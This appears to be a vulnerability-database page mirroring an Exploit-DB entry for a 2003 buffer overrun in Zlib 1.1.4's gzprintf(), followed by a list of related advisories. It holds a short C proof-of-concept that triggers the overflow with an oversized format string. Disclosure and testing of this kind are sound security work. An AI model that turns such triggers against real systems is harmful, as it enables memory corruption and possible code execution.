Lucene search
Richard KettlewelEDB-ID:22273HistoryFeb 23, 2003 - 12:00 a.m.
Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (1)
2003-02-2300:00:00
Richard Kettlewel
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
// source: https://www.securityfocus.com/bid/6913/info
A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs becuase the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function.
Successful exploitation of this vulnerability may allow an attacker to execute arbitrary instructions.
Note that only Zlib 1.1.4 has been reported vulnerable to this issue. It is not yet known whether earlier versions are also affected.
#include <zlib.h>
#include <errno.h>
#include <stdio.h>
int main(void) {
gzFile f;
int ret;
if(!(f = gzopen("/dev/null", "w"))) {
perror("/dev/null");
exit(1);
}
ret = gzprintf(f, "%10240s", "");
printf("gzprintf -> %d\n", ret);
ret = gzclose(f);
printf("gzclose -> %d [%d]\n", ret, errno);
exit(0);
}Related
debiancve
debiancve
CVE-2003-0107
2004-09-01 04:00:00
nessus
nessus
RHEL 2.1 : zlib (RHSA-2003:081)
2004-07-06 00:00:00
Mandrake Linux Security Advisory : zlib (MDKSA-2003:033)
2004-07-31 00:00:00
nvd
nvd
CVE-2003-0107
2003-03-07 05:00:00
f5
f5
SOL2593 - Buffer overflow in zlib - CAN-2003-0107
2006-10-06 00:00:00
Buffer overflow in zlib - CAN-2003-0107
2006-10-07 04:00:00
cvelist
cvelist
CVE-2003-0107
2004-09-01 04:00:00
redhat
redhat
(RHSA-2003:081) zlib security update
2003-05-22 00:00:00
exploitdb
exploitdb
Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (2)
2003-02-23 00:00:00
cert
cert
zlib "gzprintf()" function vulnerable to buffer overflow
2003-05-23 00:00:00
cve
cve
CVE-2003-0107
2004-09-01 04:00:00
jvn
jvn
JVN#78689801: BGA32.DLL and QBga32.DLL contain multiple vulnerabilities
2015-05-19 00:00:00